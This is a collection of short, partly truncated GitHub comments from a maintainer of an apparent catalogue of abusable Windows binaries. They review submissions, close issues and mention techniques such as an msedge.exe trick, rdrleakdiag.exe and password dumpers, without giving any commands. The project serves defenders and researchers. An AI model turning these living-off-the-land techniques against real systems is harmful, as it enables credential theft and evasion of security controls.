Wietze

Hey @teixeira0xfffff , could you provide some more detail on how this would work? How would you specify the file that is to be uploaded? Or does it simply reach...

(also, this being an SDK executable, your entry should reside in the OtherMSBinaries folder)

For situational awareness: a couple entries also have `SYSTEM` specified, especially some password dumpers.

The `msedge.exe` trick has been spotted in the wild: https://twitter.com/SBousseaden/status/1485283092008951815 Nice one @mrd0x - will properly review your entire PR soon.

#216 has added rdrleakdiag.exe, I'm closing this issue for now.

I believe this was fixed with #216, closing this issue for now.

A couple of executables listed above are now present in the project, e.g. `aspnet_compiler.exe`, `fsi.exe` and `fsiAnyCpu.exe`. (FYI, slightly unrelated but all blockrules executables that _ARE_ present in this project...

For the record, this was my approach: 1. Get a CSV with all commands that should be OS-native (i.e. everything except `OtherMSBinaries`). Click to show code ```python import csv, yaml,...

Couple of changes in b92ee99627d84fd17697e513960a3c423ff2dd34 : - Updated Msbuild w/ RSP entry to reflect masquerading aspect; - Removed dead payload links from Mshta entries (linking to @bohops gist in code...

Updated this branch to be up to date with the `master` branch, ready for re-review/merging :)